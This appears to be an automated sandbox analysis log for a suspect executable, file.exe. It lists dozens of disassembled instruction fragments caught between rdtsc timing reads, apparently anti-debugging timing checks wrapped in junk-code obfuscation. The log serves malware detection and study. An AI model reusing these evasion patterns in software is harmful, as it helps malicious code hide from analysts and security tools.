                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70D74 second address: 4B70E16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ecx 0x0000000d jmp 00007F488D0453FFh 0x00000012 mov eax, dword ptr [76FB65FCh] 0x00000017 jmp 00007F488D045406h 0x0000001c test eax, eax 0x0000001e jmp 00007F488D045400h 0x00000023 je 00007F48FF407F9Fh 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F488D0453FEh 0x00000030 adc cl, 00000038h 0x00000033 jmp 00007F488D0453FBh 0x00000038 popfd 0x00000039 mov eax, 2323136Fh 0x0000003e popad 0x0000003f mov ecx, eax 0x00000041 jmp 00007F488D045402h 0x00000046 xor eax, dword ptr [ebp+08h] 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F488D045403h 0x00000052 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70E16 second address: 4B70E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70E1C second address: 4B70E22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70E22 second address: 4B70E8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 1Fh 0x0000000b jmp 00007F488C756CFAh 0x00000010 ror eax, cl 0x00000012 pushad 0x00000013 mov bx, cx 0x00000016 pushfd 0x00000017 jmp 00007F488C756CFAh 0x0000001c jmp 00007F488C756D05h 0x00000021 popfd 0x00000022 popad 0x00000023 leave 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F488C756D03h 0x0000002d jmp 00007F488C756D03h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70E8C second address: 4B70EB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F488D045402h 0x00000009 and eax, 3A7E6C48h 0x0000000f jmp 00007F488D0453FBh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70EB6 second address: 4B70ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 retn 0004h 0x0000000a nop 0x0000000b mov esi, eax 0x0000000d lea eax, dword ptr [ebp-08h] 0x00000010 xor esi, dword ptr [00562014h] 0x00000016 push eax 0x00000017 push eax 0x00000018 push eax 0x00000019 lea eax, dword ptr [ebp-10h] 0x0000001c push eax 0x0000001d call 00007F4890DA7BC6h 0x00000022 push FFFFFFFEh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F488C756CFBh 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70ECF second address: 4B70ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70ED5 second address: 4B70ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70ED9 second address: 4B70F3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F488D0453FBh 0x00000015 adc cl, FFFFFFEEh 0x00000018 jmp 00007F488D045409h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F488D045400h 0x00000024 sbb si, 4368h 0x00000029 jmp 00007F488D0453FBh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B70F3A second address: 4B80008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F488C756CFFh 0x00000009 adc ch, FFFFFFAEh 0x0000000c jmp 00007F488C756D09h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 ret 0x00000018 nop 0x00000019 push eax 0x0000001a call 00007F4890DB6CFFh 0x0000001f mov edi, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov al, 66h 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B80008 second address: 4B80024 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ax, 1AEDh 0x0000000f push eax 0x00000010 push edx 0x00000011 mov bl, al 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B80024 second address: 4B80058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F488C756D01h 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 mov si, 0D39h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30008 second address: 4B3000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3000C second address: 4B30012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30012 second address: 4B3008E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F488D0453FCh 0x00000010 mov edi, esi 0x00000012 pop eax 0x00000013 mov edi, 181255F2h 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F488D045408h 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F488D0453FDh 0x00000029 xor si, D976h 0x0000002e jmp 00007F488D045401h 0x00000033 popfd 0x00000034 call 00007F488D045400h 0x00000039 pop eax 0x0000003a popad 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3008E second address: 4B30094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30094 second address: 4B300CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov di, 1586h 0x0000000f popad 0x00000010 and esp, FFFFFFF8h 0x00000013 jmp 00007F488D0453FDh 0x00000018 xchg eax, ecx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F488D045402h 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B300CC second address: 4B300FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756CFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop esi 0x0000000f call 00007F488C756D07h 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B300FA second address: 4B30138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F488D045404h 0x00000009 jmp 00007F488D045405h 0x0000000e popfd 0x0000000f mov bl, ah 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx edi, ax 0x0000001b movzx eax, dx 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30138 second address: 4B30206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F488C756CFEh 0x00000013 sub eax, 36E13408h 0x00000019 jmp 00007F488C756CFBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebx, dword ptr [ebp+10h] 0x00000023 jmp 00007F488C756D05h 0x00000028 xchg eax, esi 0x00000029 jmp 00007F488C756CFEh 0x0000002e push eax 0x0000002f pushad 0x00000030 mov al, bl 0x00000032 mov eax, 5119B229h 0x00000037 popad 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a call 00007F488C756D02h 0x0000003f mov bx, si 0x00000042 pop ecx 0x00000043 pushfd 0x00000044 jmp 00007F488C756D07h 0x00000049 jmp 00007F488C756D03h 0x0000004e popfd 0x0000004f popad 0x00000050 mov esi, dword ptr [ebp+08h] 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 movsx edx, si 0x00000059 jmp 00007F488C756CFCh 0x0000005e popad 0x0000005f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30206 second address: 4B30250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F488D045406h 0x0000000f push eax 0x00000010 jmp 00007F488D0453FBh 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F488D045405h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30250 second address: 4B30256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30256 second address: 4B3025A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3025A second address: 4B3027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F488C756CFFh 0x0000000f je 00007F48FEB55098h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3027F second address: 4B30283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30283 second address: 4B30289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30289 second address: 4B302A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488D045409h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B302A6 second address: 4B30326 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F488C756CFDh 0x00000014 je 00007F48FEB5505Fh 0x0000001a pushad 0x0000001b mov cl, EAh 0x0000001d popad 0x0000001e mov edx, dword ptr [esi+44h] 0x00000021 pushad 0x00000022 mov edi, esi 0x00000024 pushfd 0x00000025 jmp 00007F488C756CFCh 0x0000002a jmp 00007F488C756D05h 0x0000002f popfd 0x00000030 popad 0x00000031 or edx, dword ptr [ebp+0Ch] 0x00000034 jmp 00007F488C756CFEh 0x00000039 test edx, 61000000h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F488C756D07h 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30326 second address: 4B3033D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F48FF44374Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3033D second address: 4B30341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30341 second address: 4B30347 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20810 second address: 4B20814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20814 second address: 4B2081A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2081A second address: 4B20855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 42B92D99h 0x00000008 jmp 00007F488C756D06h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F488C756D07h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20855 second address: 4B20881 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F488D0453FAh 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20881 second address: 4B2093D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756CFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov dx, ax 0x0000000f mov dh, al 0x00000011 popad 0x00000012 call 00007F488C756D05h 0x00000017 pushfd 0x00000018 jmp 00007F488C756D00h 0x0000001d add eax, 27FDA2A8h 0x00000023 jmp 00007F488C756CFBh 0x00000028 popfd 0x00000029 pop ecx 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e jmp 00007F488C756D05h 0x00000033 pushfd 0x00000034 jmp 00007F488C756D00h 0x00000039 sbb ax, 5038h 0x0000003e jmp 00007F488C756CFBh 0x00000043 popfd 0x00000044 popad 0x00000045 and esp, FFFFFFF8h 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007F488C756CFBh 0x00000051 jmp 00007F488C756D03h 0x00000056 popfd 0x00000057 mov eax, 0F0EC84Fh 0x0000005c popad 0x0000005d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2093D second address: 4B20976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045405h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F488D0453FEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F488D0453FEh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20A9F second address: 4B20AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F48FEB5C5DDh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F488C756CFDh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20AD1 second address: 4B20AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20AD7 second address: 4B20ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20ADB second address: 4B20BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FB6968h], 00000002h 0x0000000f jmp 00007F488D0453FFh 0x00000014 jne 00007F48FF44ACB3h 0x0000001a jmp 00007F488D045406h 0x0000001f mov edx, dword ptr [ebp+0Ch] 0x00000022 jmp 00007F488D045400h 0x00000027 xchg eax, ebx 0x00000028 pushad 0x00000029 mov dl, ah 0x0000002b pushfd 0x0000002c jmp 00007F488D045403h 0x00000031 xor si, 3DEEh 0x00000036 jmp 00007F488D045409h 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F488D045407h 0x00000045 or al, FFFFFFFEh 0x00000048 jmp 00007F488D045409h 0x0000004d popfd 0x0000004e pushfd 0x0000004f jmp 00007F488D045400h 0x00000054 or ecx, 44CB1AF8h 0x0000005a jmp 00007F488D0453FBh 0x0000005f popfd 0x00000060 popad 0x00000061 xchg eax, ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 mov cx, dx 0x00000068 pushfd 0x00000069 jmp 00007F488D045407h 0x0000006e add ax, 936Eh 0x00000073 jmp 00007F488D045409h 0x00000078 popfd 0x00000079 popad 0x0000007a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20BFA second address: 4B20C2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F488C756D07h 0x00000008 pop eax 0x00000009 mov di, D72Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 mov dl, ch 0x00000014 movsx edi, si 0x00000017 popad 0x00000018 mov dword ptr [esp], ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20C2D second address: 4B20C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20C31 second address: 4B20C48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20D21 second address: 4B20D43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov edi, 58D800D0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F488D045402h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20D43 second address: 4B20D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20D49 second address: 4B20D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30D6A second address: 4B30D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30D6E second address: 4B30D72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30D72 second address: 4B30D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30D78 second address: 4B30D7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30D7E second address: 4B30D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30D82 second address: 4B30DAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045408h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, 3523h 0x00000013 mov ecx, 274F007Fh 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30DAE second address: 4B30DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30DB4 second address: 4B30DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30DB8 second address: 4B30DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30DBC second address: 4B30DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30DC8 second address: 4B30DD4 instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov cx, 0103h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30B12 second address: 4B30B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30B16 second address: 4B30B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30B1A second address: 4B30B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30B20 second address: 4B30B50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F488C756D05h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA0C1C second address: 4BA0C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA0C22 second address: 4BA0C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA0C26 second address: 4BA0C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F488D045409h 0x00000011 pushfd 0x00000012 jmp 00007F488D045400h 0x00000017 xor eax, 39A61848h 0x0000001d jmp 00007F488D0453FBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA0C6F second address: 4BA0CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dx, 2378h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 movsx edi, si 0x00000013 pushfd 0x00000014 jmp 00007F488C756D06h 0x00000019 adc cx, BDD8h 0x0000001e jmp 00007F488C756CFBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F488C756D04h 0x0000002e adc cx, 0838h 0x00000033 jmp 00007F488C756CFBh 0x00000038 popfd 0x00000039 push eax 0x0000003a push edx 0x0000003b pushfd 0x0000003c jmp 00007F488C756D06h 0x00000041 adc ax, 0298h 0x00000046 jmp 00007F488C756CFBh 0x0000004b popfd 0x0000004c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90F10 second address: 4B90F89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F488D0453FEh 0x00000008 pop ecx 0x00000009 mov edx, 2B855C66h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F488D045408h 0x00000019 sbb ecx, 064DBC08h 0x0000001f jmp 00007F488D0453FBh 0x00000024 popfd 0x00000025 pushad 0x00000026 mov ax, 9295h 0x0000002a mov di, si 0x0000002d popad 0x0000002e popad 0x0000002f mov dword ptr [esp], ebp 0x00000032 jmp 00007F488D0453FCh 0x00000037 mov ebp, esp 0x00000039 jmp 00007F488D045400h 0x0000003e pop ebp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90F89 second address: 4B90FA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90FA6 second address: 4B90FAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90FAC second address: 4B90FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90FB0 second address: 4B90FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
